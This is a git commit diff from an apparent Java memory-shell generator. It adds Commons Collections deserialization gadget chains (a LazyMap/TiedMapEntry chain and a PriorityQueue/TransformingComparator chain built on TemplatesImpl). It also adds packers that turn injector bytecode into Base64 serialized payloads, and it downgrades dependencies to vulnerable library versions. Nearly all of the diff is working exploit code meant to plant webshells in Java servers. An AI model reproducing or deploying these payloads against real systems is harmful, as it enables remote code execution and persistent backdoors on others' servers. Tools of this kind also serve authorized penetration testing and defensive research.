feat: support CC payload generate

Author: ReaJason

build.gradle

@@ -36,9 +36,9 @@ jacocoTestReport {
         classDirectories.from(
                 fileTree('generator/build/classes/java/main') {
                     excludes = [
-                            'com/reajason/javaweb/memsell/**/godzilla/**',
-                            'com/reajason/javaweb/memsell/**/injector/**',
-                            'com/reajason/javaweb/memsell/**/command/**',
+                            'com/reajason/javaweb/memshell/**/godzilla/**',
+                            'com/reajason/javaweb/memshell/**/injector/**',
+                            'com/reajason/javaweb/memshell/**/command/**',
                             'com/reajason/javaweb/config/**'
                     ]
                 }

deserialize/build.gradle

@@ -6,10 +6,13 @@ group = 'com.reajason.javaweb'
 version = rootProject.version
 
 dependencies {
+    implementation project(":common")
     implementation 'net.bytebuddy:byte-buddy'
 
     implementation 'com.caucho:hessian:4.0.66'
-    implementation 'commons-beanutils:commons-beanutils:1.9.4'
+    implementation 'commons-beanutils:commons-beanutils:1.9.2'
+    implementation 'commons-collections:commons-collections:3.2.1'
+    implementation 'org.apache.commons:commons-collections4:4.0'
 
     testImplementation platform('org.junit:junit-bom')
     testImplementation 'org.junit.jupiter:junit-jupiter'

deserialize/src/main/java/com/reajason/javaweb/deserialize/PayloadType.java

@@ -1,10 +1,7 @@
 package com.reajason.javaweb.deserialize;
 
 import com.reajason.javaweb.deserialize.payload.hessian.XSLTScriptEngine;
-import com.reajason.javaweb.deserialize.payload.java.CommonsBeanutils110;
-import com.reajason.javaweb.deserialize.payload.java.CommonsBeanutils16;
-import com.reajason.javaweb.deserialize.payload.java.CommonsBeanutils18;
-import com.reajason.javaweb.deserialize.payload.java.CommonsBeanutils19;
+import com.reajason.javaweb.deserialize.payload.java.*;
 import lombok.Getter;
 
 /**
@@ -21,6 +18,12 @@ public enum PayloadType {
     CommonsBeanutils19(new CommonsBeanutils19()),
     CommonsBeanutils110(new CommonsBeanutils110()),
 
+    /**
+     * CC 链
+     */
+    CommonsCollections3(new CommonCollections3()),
+    CommonsCollections4(new CommonCollections4()),
+
     /**
      * Hessian XSLT write
      */

deserialize/src/main/java/com/reajason/javaweb/deserialize/TemplateUtils.java

@@ -1,12 +1,13 @@
 package com.reajason.javaweb.deserialize;
 
+import com.reajason.javaweb.buddy.TargetJreVersionVisitorWrapper;
 import com.reajason.javaweb.deserialize.utils.Reflections;
-import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 import lombok.SneakyThrows;
 import net.bytebuddy.ByteBuddy;
 import net.bytebuddy.dynamic.DynamicType;
+import net.bytebuddy.jar.asm.Opcodes;
 
 /**
  * @author ReaJason
@@ -20,6 +21,7 @@ public static TemplatesImpl createTemplatesImpl(byte[] bytes) {
         byte[] fooBytes;
         try (DynamicType.Unloaded<Object> make = new ByteBuddy()
                 .subclass(Object.class).name("foo")
+                .visit(new TargetJreVersionVisitorWrapper(Opcodes.V1_6))
                 .make()) {
             fooBytes = make.getBytes();
         }

deserialize/src/main/java/com/reajason/javaweb/deserialize/payload/java/CommonCollections3.java

@@ -0,0 +1,43 @@
+package com.reajason.javaweb.deserialize.payload.java;
+
+import com.reajason.javaweb.deserialize.Payload;
+import com.reajason.javaweb.deserialize.TemplateUtils;
+import com.reajason.javaweb.deserialize.utils.Reflections;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import lombok.SneakyThrows;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+
+import java.util.HashMap;
+import java.util.Map;
+
+/**
+ * CC11 链 from <a href="https://github.com/dota-st/JavaSec/blob/master/03-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/9-CommonsCollections11/CommonsCollections11.md">CommonsCollections11.md</a>
+ *
+ * @author ReaJason
+ * @since 2025/4/2
+ */
+public class CommonCollections3 implements Payload {
+
+    @Override
+    @SneakyThrows
+    @SuppressWarnings({"rawtypes", "unchecked"})
+    public Object generate(byte[] bytes) {
+        TemplatesImpl templates = TemplateUtils.createTemplatesImpl(bytes);
+
+        InvokerTransformer invokerTransformer = new InvokerTransformer("toString", null, null);
+
+        Map innerMap = new HashMap<>();
+        Map outerMap = LazyMap.decorate(innerMap, invokerTransformer);
+
+        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, templates);
+
+        Map expMap = new HashMap<>();
+        expMap.put(tiedMapEntry, "valueTest");
+        outerMap.remove(templates);
+
+        Reflections.setFieldValue(invokerTransformer, "iMethodName", "newTransformer");
+        return expMap;
+    }
+}

deserialize/src/main/java/com/reajason/javaweb/deserialize/payload/java/CommonCollections4.java

@@ -0,0 +1,39 @@
+package com.reajason.javaweb.deserialize.payload.java;
+
+import com.reajason.javaweb.deserialize.Payload;
+import com.reajason.javaweb.deserialize.TemplateUtils;
+import com.reajason.javaweb.deserialize.utils.Reflections;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
+import lombok.SneakyThrows;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.ChainedTransformer;
+import org.apache.commons.collections4.functors.ConstantTransformer;
+import org.apache.commons.collections4.functors.InstantiateTransformer;
+
+import javax.xml.transform.Templates;
+import java.util.PriorityQueue;
+
+/**
+ * @author ReaJason
+ * @since 2025/4/2
+ */
+public class CommonCollections4 implements Payload {
+
+    @Override
+    @SneakyThrows
+    @SuppressWarnings({"rawtypes", "unchecked"})
+    public Object generate(byte[] bytes) {
+        TemplatesImpl templates = TemplateUtils.createTemplatesImpl(bytes);
+        ChainedTransformer chain =
+                new ChainedTransformer(
+                        new ConstantTransformer(TrAXFilter.class),
+                        new InstantiateTransformer(
+                                new Class[]{Templates.class}, new Object[]{templates}));
+        TransformingComparator comparator = new TransformingComparator(chain);
+        PriorityQueue queue = new PriorityQueue(2, comparator);
+        Reflections.setFieldValue(queue, "size", 2);
+        Reflections.setFieldValue(queue, "comparator", comparator);
+        return queue;
+    }
+}

generator/build.gradle

@@ -10,7 +10,7 @@ java {
     targetCompatibility = JavaVersion.VERSION_1_8
 }
 
-group = 'com.reajason.javaweb.memsell'
+group = 'com.reajason.javaweb'
 version = rootProject.version
 
 tasks.withType(Test).configureEach {
@@ -35,6 +35,7 @@ test {
 dependencies {
     implementation project(":common")
     implementation project(":deserialize")
+
     implementation project(":memshell")
     implementation project(":memshell-java8")
     implementation 'net.bytebuddy:byte-buddy'

generator/src/main/java/com/reajason/javaweb/memshell/Packers.java

@@ -103,6 +103,8 @@ public enum Packers {
     JavaCommonsBeanutils17(new CommonsBeanutils18Packer(), JavaDeserializePacker.class),
     JavaCommonsBeanutils16(new CommonsBeanutils16Packer(), JavaDeserializePacker.class),
     JavaCommonsBeanutils110(new CommonsBeanutils110Packer(), JavaDeserializePacker.class),
+    JavaCommonsCollections3(new CommonsCollections3Packer(), JavaDeserializePacker.class),
+    JavaCommonsCollections4(new CommonsCollections4Packer(), JavaDeserializePacker.class),
 
     /**
      * Hessian 反序列化打包器

generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsCollections3Packer.java

@@ -0,0 +1,24 @@
+package com.reajason.javaweb.memshell.packer.deserialize.java;
+
+import com.reajason.javaweb.deserialize.DeserializeConfig;
+import com.reajason.javaweb.deserialize.JavaDeserializeGenerator;
+import com.reajason.javaweb.deserialize.PayloadType;
+import com.reajason.javaweb.memshell.config.GenerateResult;
+import com.reajason.javaweb.memshell.packer.Packer;
+import lombok.SneakyThrows;
+import org.apache.commons.codec.binary.Base64;
+
+/**
+ * @author ReaJason
+ * @since 2025/2/17
+ */
+public class CommonsCollections3Packer implements Packer {
+
+    @Override
+    @SneakyThrows
+    public String pack(GenerateResult generateResult) {
+        DeserializeConfig deserializeConfig = new DeserializeConfig();
+        deserializeConfig.setPayloadType(PayloadType.CommonsCollections3);
+        return Base64.encodeBase64String(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig));
+    }
+}

generator/src/main/java/com/reajason/javaweb/memshell/packer/deserialize/java/CommonsCollections4Packer.java

@@ -0,0 +1,24 @@
+package com.reajason.javaweb.memshell.packer.deserialize.java;
+
+import com.reajason.javaweb.deserialize.DeserializeConfig;
+import com.reajason.javaweb.deserialize.JavaDeserializeGenerator;
+import com.reajason.javaweb.deserialize.PayloadType;
+import com.reajason.javaweb.memshell.config.GenerateResult;
+import com.reajason.javaweb.memshell.packer.Packer;
+import lombok.SneakyThrows;
+import org.apache.commons.codec.binary.Base64;
+
+/**
+ * @author ReaJason
+ * @since 2025/2/17
+ */
+public class CommonsCollections4Packer implements Packer {
+
+    @Override
+    @SneakyThrows
+    public String pack(GenerateResult generateResult) {
+        DeserializeConfig deserializeConfig = new DeserializeConfig();
+        deserializeConfig.setPayloadType(PayloadType.CommonsCollections4);
+        return Base64.encodeBase64String(JavaDeserializeGenerator.generate(generateResult.getInjectorBytes(), deserializeConfig));
+    }
+}